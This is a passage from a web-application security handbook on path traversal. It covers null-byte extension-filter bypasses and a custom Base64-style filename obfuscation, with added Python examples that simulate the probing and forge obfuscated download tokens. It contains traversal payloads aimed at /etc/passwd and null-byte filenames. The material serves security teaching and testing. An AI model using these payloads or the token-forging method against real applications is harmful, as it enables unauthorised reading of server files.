The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws
sequence bypasses don't enable you to access /etc/passwd, probe whether any file type filtering is implemented and can be bypassed, by requesting diagram1.jpg%00.jpg. If the image is returned, the extension check is being applied to the full supplied name while the underlying file API truncates it at the null byte, so the file type filter can be bypassed on its own, independently of whatever is blocking the traversal sequence.

Working entirely within the start directory defined by the application, try to probe to understand all of the filters being implemented, and see whether each can be bypassed individually with the techniques described.

Of course, if you have white box access to the application, then your task is much easier, because you can systematically work through different types of input and verify conclusively what filename (if any) is actually reaching the file system.
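Added example, not code from the book: a small Python model of the probing just described. Every name in it is an assumption: a constructed in-memory file system under an assumed start directory, a "legacy" file API that cuts the name at the first NUL byte the way C-string APIs do, an extension filter that runs before it, and a hardened variant that rejects NUL bytes and confines the resolved path. Running the same probes through both shows why diagram1.jpg%00.jpg is the right first request: it tests the file type filter by itself, without also needing the traversal sequence to work.

```python
import posixpath
from urllib.parse import unquote

# Constructed sample data: an assumed start directory and an in-memory "file system".
START_DIR = "/var/www/app/images"
FAKE_FS = {
    "/var/www/app/images/diagram1.jpg": b"\xff\xd8\xff\xe0 (constructed jpeg bytes)",
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
}

# Probes in the order the text suggests: the legitimate name, the null-byte
# file-type probe, then traversal with and without the null byte.
PROBES = [
    "diagram1.jpg",
    "diagram1.jpg%00.jpg",
    "../../../../etc/passwd",
    "../../../../etc/passwd%00.jpg",
]


class Rejected(Exception):
    """Raised when a filter blocks the request."""


def legacy_open(name):
    """Models a file API built on C strings: the name is cut at the first NUL byte,
    then resolved relative to START_DIR. Returns the file bytes, or None if absent."""
    name = name.split("\x00", 1)[0]
    resolved = posixpath.normpath(posixpath.join(START_DIR, name))
    return FAKE_FS.get(resolved)


def vulnerable_fetch(raw_param):
    """Extension filter applied to the decoded parameter, before NUL truncation."""
    name = unquote(raw_param)
    if not name.lower().endswith(".jpg"):
        raise Rejected("file type not allowed")
    return legacy_open(name)


def hardened_fetch(raw_param):
    """Rejects NUL bytes, checks the extension, and confines the resolved path to START_DIR."""
    name = unquote(raw_param)
    if "\x00" in name:
        raise Rejected("NUL byte in filename")
    if not name.lower().endswith(".jpg"):
        raise Rejected("file type not allowed")
    resolved = posixpath.normpath(posixpath.join(START_DIR, name))
    if not resolved.startswith(START_DIR + "/"):
        raise Rejected("path escapes start directory")
    return FAKE_FS.get(resolved)


def probe(fetch, payloads=PROBES):
    """Runs each payload through a fetch function and records the observable outcome."""
    results = {}
    for payload in payloads:
        try:
            data = fetch(payload)
        except Rejected as exc:
            results[payload] = "blocked: " + str(exc)
        else:
            results[payload] = "served" if data is not None else "not found"
    return results


if __name__ == "__main__":
    for label, fetch in (("vulnerable", vulnerable_fetch), ("hardened", hardened_fetch)):
        print(label)
        for payload, outcome in probe(fetch).items():
            print(f"  {payload:35} {outcome}")
```

Against the vulnerable model the null-byte probe is served while the bare traversal is blocked by the extension filter; that pattern tells the tester the two filters fail independently and that a combined payload is worth trying. Against the hardened model every probe but the legitimate name is blocked at the first check that applies.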

Coping with Custom Encoding

Probably the craziest path traversal bug that the authors have encountered involved a custom encoding scheme for filenames that were ultimately handled in an unsafe way, and demonstrated how obfuscation provides no substitute for security.

The application contained some workflow functionality that enabled users to upload and download files. The request performing the upload supplied a filename parameter that was vulnerable to a path traversal attack when writing the file. When a file had been successfully uploaded, the application provided users with a URL to download it again. There were two important caveats:

■ The application verified whether the file to be written already existed, and if so, refused to overwrite it.

■ The URLs generated for downloading users' files were represented using a bespoke obfuscation scheme. This appeared to be a customized form of Base64-encoding, in which a different character set was employed at each position of the encoded filename.
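Added example, not the book's code and not an account of how the authors went on to exploit this application (that part of the story lies beyond this excerpt). It builds a hypothetical scheme with the property described, a different Base64 character set at each position, and shows the general reason such obfuscation is no substitute for security: the upload feature is an encoding oracle, and 64 chosen filenames are enough to recover every position's alphabet, after which any filename, including a traversal payload, can be turned into a valid-looking download token. The unpadded-Base64 layout, MAX_LEN and all function names are assumptions.

```python
import base64
import random
import string

# Standard Base64 symbol order; the hypothetical server uses a shuffled copy per output position.
B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
MAX_LEN = 48  # assumed upper bound on the length of an obfuscated name, in characters


def make_server_tables(rng=None):
    """Hypothetical server secret: one independently shuffled 64-symbol alphabet per position."""
    rng = rng or random.SystemRandom()
    tables = []
    for _ in range(MAX_LEN):
        alphabet = list(B64_ALPHABET)
        rng.shuffle(alphabet)
        tables.append("".join(alphabet))
    return tables


def server_obfuscate(name, tables):
    """Hypothetical scheme matching the description: unpadded Base64 of the filename,
    then each output character is substituted through that position's own alphabet."""
    std = base64.b64encode(name).decode().rstrip("=")
    return "".join(tables[i][B64_ALPHABET.index(ch)] for i, ch in enumerate(std))


def recover_tables(oracle, max_len=MAX_LEN):
    """Chosen-plaintext recovery of the per-position alphabets with 64 oracle calls.
    A 3-byte block whose four 6-bit groups all equal v encodes, in standard Base64, to
    the symbol for v four times; repeating the block fills every position with that one
    symbol, so the oracle output reveals how each position substitutes it."""
    nblocks = (max_len + 3) // 4
    forward = [dict() for _ in range(max_len)]  # forward[i][standard char] = obfuscated char
    for v in range(64):
        block = ((v << 18) | (v << 12) | (v << 6) | v).to_bytes(3, "big")
        out = oracle(block * nblocks)
        for i, ch in enumerate(out[:max_len]):
            forward[i][B64_ALPHABET[v]] = ch
    return forward


def forge(name, forward):
    """Produces the obfuscated form of an arbitrary filename without the server secret."""
    std = base64.b64encode(name).decode().rstrip("=")
    return "".join(forward[i][ch] for i, ch in enumerate(std))


def deobfuscate(token, forward):
    """Inverts a captured token back to the filename using the recovered tables."""
    reverse = [{obf: std for std, obf in table.items()} for table in forward]
    std = "".join(reverse[i][ch] for i, ch in enumerate(token))
    return base64.b64decode(std + "=" * (-len(std) % 4))


def demo(seed=None):
    """Runs the attack against a freshly keyed server.
    Returns (tables fully recovered, forged token matches, token decodes back)."""
    tables = make_server_tables(random.Random(seed) if seed is not None else None)
    # The oracle stands in for "upload a file with this name, read back its download URL".
    oracle = lambda name: server_obfuscate(name, tables)
    forward = recover_tables(oracle)
    tables_ok = all(forward[i][B64_ALPHABET[v]] == tables[i][v]
                    for i in range(MAX_LEN) for v in range(64))
    target = b"../../../../etc/passwd"  # constructed traversal payload
    forged = forge(target, forward)
    return (tables_ok,
            forged == server_obfuscate(target, tables),
            deobfuscate(forged, forward) == target)


if __name__ == "__main__":
    print(demo())
```

The cost of the recovery does not depend on how the alphabets were chosen, only on the scheme being deterministic and the attacker being able to see the encoding of names they pick; that is exactly what an upload-then-download feature provides.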

